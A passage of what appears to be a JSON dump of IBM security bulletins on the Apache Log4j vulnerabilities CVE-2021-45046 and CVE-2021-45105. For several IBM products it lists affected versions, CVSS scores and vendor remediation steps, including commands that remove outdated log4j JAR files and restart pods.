- 1.7.3| 4.0 Refresh 1 - 3 \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.7.3| 4.0 Refresh 4 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Affected Product(s)**| **DV Version(s) **| **CPD Version(s) **| **Fixes** \n---|---|---|--- \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.3.0| 2.5.0| \n\nUpgrade to version 1.5.0 patch version 1.5.0.0-270 (DV) /\n\n3.5 Refresh 10 (CPD) \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.4.1| 3.0.1| \n\nUpgrade to version 1.5.0 patch version 1.5.0.0-270 (DV) /\n\n3.5 Refresh 10 (CPD) \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.5.0| \n\n3.5,\n\n3.5 Refresh 1 - 9\n\n| \n\nApply patch version 1.5.0.0-270 (DV) /\n\n3.5 Refresh 10 (CPD) \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.7.1 - 1.7.3| 4.0 Refresh 1 - 3| \n\nUpdate to version 1.7.5 (DV) /\n\n4.0 Refresh 5 (CPD) \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.7.3| 4.0 Refresh 4| \n\nUpdate to version 1.7.5 (DV) /\n\n4.0 Refresh 5 (CPD) \n \n**You must update the Cloud Pak for Data platform to version 4.0 Refresh 5 to install the fix for Data Virtualization.**\n\nTo update Cloud Pak for Data platform to 4.0 Refresh 5, see the following links:\n\n * [Updating Data Virtualization from Version 3.5](<https://www.ibm.com/docs/SSQNUZ_4.0/svc-dv/dv-operator-upgrade-v35.html> \"Updating Data Virtualization from Version 3.5\" )\n * [Updating Data Virtualization from Version 4.0.1 or later](<https://www.ibm.com/docs/SSQNUZ_4.0/svc-dv/dv-operator-upgrade-v4.html>)\n\n**The following procedure covers the steps after installing the fix for Data Virtualization**.\n\n 1. Run the following steps from the Data Virtualization head pod to manually remove unnecessary files from your updated Data Virtualization instance. These include files that contained old log4j binaries. Not all of the files might be present if you previously installed other log4j fixes. \n\n 1. Log in to the Data Virtualization head pod. \n \n oc rsh c-db2u-dv-db2u-0\n\n 2. Switch to the db2inst1 user. \n \n su - db2inst1\n\n 3. Remove unnecessary JAR files. \n \n rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.8.2.jar /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.8.2.jar /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.15.0.jar /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.15.0.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-api-2.8.2.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-core-2.8.2.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-api-2.15.0.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-core-2.15.0.jar\n \n ${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.8.2.jar\"\n \n ${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.8.2.jar\"\n \n ${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.15.0.jar\"\n \n ${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.15.0.jar\"\n\n 4. Remove unnecessary ZIP and TAR files. \n \n rm -rf /mnt/PV/versioned/uc_dsserver_shared/config/DATAVIRTUALIZATION_ENDPOINT_V1.7*.tar.gz /mnt/PV/versioned/uc_dsserver_shared/config/DATAVIRTUALIZATION_ENDPOINT_V1.7*.zip\n\n 5. Copy the latest TAR file. \n \n cp /opt/ibm/qp_artifacts/archives/DATAVIRTUALIZATION_ENDPOINT_V1.7.5_*.tar.gz /mnt/PV/versioned/uc_dsserver_shared/config\n\n 6. Copy the latest ZIP file. \n \n cp /opt/ibm/qp_artifacts/archives/DATAVIRTUALIZATION_ENDPOINT_V1.7.5_*.zip /mnt/PV/versioned/uc_dsserver_shared/config\n\n 2. Complete the following steps to manually restart head and worker pods to complete applying the fix. This manual restart can be performed by running the following command: \n\n 1. Wait for the Data Virtualization hurricane pod to start up successfully.\n 2. Run the following commands to restart the Data Virtualization head and worker pods: \n \n current_replicas=$(oc get sts c-db2u-dv-db2u -o jsonpath=\"{.spec.replicas}\"); oc scale sts c-db2u-dv-db2u --replicas=0; sleep 3m; oc scale sts c-db2u-dv-db2u --replicas=$current_replicas\n\n 3. If you see the following error message, restart the Data Virtualization hurricane pod and then repeat step 2. b) \n \n ERR api/pkg/cli/sideload/load.go:73 error=\"file is the wrong size: 154274816, expected: 154143232\\n\"\n\n 3. Data Virtualization is now ready to use.\n\n**Note**_:_\n\n_If you run a security vulnerability scanning tool on the Docker images, you might find that some of the affected packages at the affected version are still present on it. _\n\n_Those packages have been modified according to guidance provided by the Apache Log4j development team so that they are no longer vulnerable._\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n24 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSK1AQ\",\"label\":\"IBM Data Virtualization\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF043\",\"label\":\"Red Hat\"},{\"code\":\"PF040\",\"label\":\"RedHat OpenShift\"}],\"Version\":\"1.3.0\\/2.5.0, 1.4.1\\/3.0.1, 1.5.0\\/3.5, 1.5.0\\/3.5 Refresh 1 - 9, 1.7.1 - 1.7.3\\/4.0 Refresh 1 - 3, 1.7.3\\/4.0 Refresh 4\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSK1AQ\",\"label\":\"IBM Data Virtualization\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF043\",\"label\":\"Red Hat\"},{\"code\":\"PF040\",\"label\":\"RedHat OpenShift\"}],\"Version\":\"1.3.0\\/2.5.0, 1.4.1\\/3.0.1, 1.5.0\\/3.5, 1.5.0\\/3.5 Refresh 1 - 9, 1.7.1 - 1.7.3\\/4.0 Refresh 1 - 3, 1.7.3\\/4.0 Refresh 4\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-29T00:31:33", "type": "ibm", "title": "Security Bulletin: IBM Data Virtualization on Cloud Pak for Data is vulnerable to arbitrary code execution (CVE-2021-45046) and denial of service (CVE-2021-45105) due to Apache Log4j", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-29T00:31:33", "id": "185EAAB4DDC8472DF44603A1F8F5361C61E9CD92D640BE3D1EC6D31AE959C4F0", "href": "https://www.ibm.com/support/pages/node/6551744", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-19T13:26:25", "description": "## Summary\n\nFor the 8.0.0 version of MSO, which is distributed as part of the MAS catalog here are the instructions to move to the 8.0.3 version to get log4j 2.17.1 Apache Log4j - [CVE-2021-45105] (affecting v2.16) and [CVE-2021-45046] (affecting v2.15) \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Maximo Scheduler Optimization| All \n \n\n\n## Remediation/Fixes\n\n**How to manually get Maximo Scheduler Optimization 8.0.0 (MSO) updated to Apache log4j 2.17.1 **\n\n**IBM strongly suggests the following update: \n**\n\nUpdate the Maximo Scheduler Optimization 8.0.0 installed on Maximo Application Suite (MAS) to Version 8.0.3 of MSO.\n\n### Update **Maximo Scheduler Optimization** application\n\nWhen new versions of applications are available, you can update the deployed applications.\n\nTo update an application:\n\n 1. From the Suite Administration Applications pane, select the Addon tab and find the Maximo Scheduler Optimization application that you want to update.\n 2. On the application summary page confirm the 8.0.3 or > version, click **Update**\n\n**Product(s)**| **Version(s) \n**| **Remediation/Fix/Instructions** \n---|---|--- \nIBM Maximo Scheduler Optimization | 8.0| \n\nUpdate [8.0](<https://www.ibm.com/docs/en/mas86/8.6.0?topic=ons-maximo-scheduler-optimization> \"8.0\" ) and follow [instructions](<https://www.ibm.com/docs/en/mas87/8.7.0?topic=ons-maximo-scheduler-optimization> \"instructions\" ) to get the 8.0.3 or > version \n \n## Workarounds and Mitigations\n\nFor MSO 8 version update to the latest version available 8.0.3\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\nN/A\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nN/A\n\n## Change History\n\n30 Sep 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSLKT6\",\"label\":\"Maximo Asset Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"8.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-19T14:06:26", "type": "ibm", "title": "Security Bulletin: Apache log4j security vulnerability as it relates to IBM Maximo Scheduler Optimization - Apache Log4j - [CVE-2021-45105] (affecting v2.16) and [CVE-2021-45046] (affecting v2.15)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-10-19T14:06:26", "id": "965AA3643F2C2723C5C9B471B69786B972B6D81B6C917B50EE5BFD6C8447279C", "href": "https://www.ibm.com/support/pages/node/6830617", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:17", "description": "## Summary\n\nApache Log4j open source library used by IBM\u00ae Db2\u00ae On Openshift and IBM\u00ae Db2\u00ae and Db2 Warehouse\u00ae on Cloud Pak for Data are affected by multiple vulnerabilities (CVE-2021-45105 and CVE-2021-45046). This library is used by the Db2 Federation and Db2 Graph feature as part of its logging infrastructure. The fix includes includes Apache Log4j v2.17.0.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAll platforms of the following IBM\u00ae Db2\u00ae On Openshift fix pack releases and IBM\u00ae Db2\u00ae and Db2 Warehouse\u00ae on Cloud Pak for Data refresh levels are affected:\n\nRelease| Version \n---|--- \nIBM\u00ae Db2\u00ae On Openshift| \n\nv11.5.5.0 - v11.5.5.0-cn4 \nv11.5.5.1 - v11.5.5.1-cn3 \nv11.5.6.0 - v11.5.6.0-cn5 \nv11.5.7.0 \n \nIBM\u00ae Db2\u00ae and Db2 Warehouse\u00ae on Cloud Pak for Data| \n\nv3.5 through refresh 9 \nv4.0 through refresh 4 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading to the latest IBM Db2 On Openshift or the IBM Db2 and Db2 Warehouse on Cloud Pak for Data refresh release containing the fix for this issue. These builds are available based on the most recent fixpack level of the V11.5.7 release and the Cloud Pak for Data v3.5 refresh 9, 4.0 refresh 4 release. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\nPlease note: If the affected release is any refresh level of Cloud Pak for Data 3.5, it is strongly recommended to upgrade to Cloud Pak for Data 4.0, then apply the latest refresh release \n\n\nProduct| Fixed in Fix Pack| Instructions \n---|---|--- \nIBM\u00ae Db2\u00ae On Openshift| \n\nv11.5.5.1-cn4\n\nv11.5.7.0-cn1\n\n| \n\n<https://www.ibm.com/docs/en/db2/11.5?topic=1156-upgrading-updating> \n \nIBM\u00ae Db2\u00ae and Db2 Warehouse\u00ae on Cloud Pak for Data| \n\nv3.5 refresh 10\n\nv4.0 refresh 5\n\n| \n\n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=upgrading> \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n26 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSCJDQ\",\"label\":\"IBM Db2 Warehouse\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All versions of 11.5, All versions of Cloud Pak for Data\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-26T15:01:15", "type": "ibm", "title": "Security Bulletin:IBM\u00ae Db2\u00ae On Openshift and IBM\u00ae Db2\u00ae and Db2 Warehouse\u00ae on Cloud Pak for Data is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-26T15:01:15", "id": "CDF01D5D29ED4731048DA0F1A6FDE407B2DA246B226E3DF9945EBC838B4660A1", "href": "https://www.ibm.com/support/pages/node/6551118", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:37:10", "description": "## Summary\n\nBased on current information and analysis, IBM Jazz for Service Management does not use Apache log4j-core library which is vulnerable to CVE-2021-45105, CVE-2021-45046 . However, IBM Jazz for Service Management may be impacted because the old version of Log4j-1.2-api and Log4j-api are used in the application. \n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n**DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nJazz for Service Management | 1.1.3 \n \n## Remediation/Fixes\n\n**Affected JazzSM Version** | **Recommended Fix.** \n---|--- \nJazz for Service Management versions 1.1.3 - 1.1.3.6 | \n\n**Note:** 1.1.3.13-TIV-JazzSM-DASH-iFix-0002 has been superseded by [1.1.3.13-TIV-JazzSM-DASH-iFix-0003](<https://www.ibm.com/support/pages/node/6536710> \"1.1.3.13-TIV-JazzSM-DASH-iFix-0002\" )\n\n1\\. Upgrade to any of the following: [1.1.3-TIV-JazzSM-multi-FP007, ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"\" )[1.1.3-TIV-JazzSM-multi-FP008, ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"\" )[1.1.3-TIV-JazzSM-multi-FP009, ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"\" )[1.1.3-TIV-JazzSM-multi-FP010](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"\" ), [1.1.3-TIV-JazzSM-multi-FP011](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"\" ), [1.1.3-TIV-JazzSM-multi-FP012](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"\" ), [1.1.3-TIV-JazzSM-multi-FP013](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"\" )\n\n2\\. Install [1.1.3.13-TIV-JazzSM-DASH-iFix-0002.](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"1.1.3.13-TIV-JazzSM-DASH-iFix-0002\" ) (This fix supersedes 1.1.3.13-TIV-JazzSM-DASH-iFix-0001) \n \nJazz for Service Management versions 1.1.3.7 - 1.1.3.13 | \n\n**Note:** 1.1.3.13-TIV-JazzSM-DASH-iFix-0002 has been superseded by [1.1.3.13-TIV-JazzSM-DASH-iFix-0003](<https://www.ibm.com/support/pages/node/6536710> \"1.1.3.13-TIV-JazzSM-DASH-iFix-0002\" )\n\n1\\. Install [1.1.3.13-TIV-JazzSM-DASH-iFix-0003](<https://www.ibm.com/support/pages/node/6536710> \"1.1.3.13-TIV-JazzSM-DASH-iFix-0002\" )[.](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"1.1.3.13-TIV-JazzSM-DASH-iFix-0002\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business 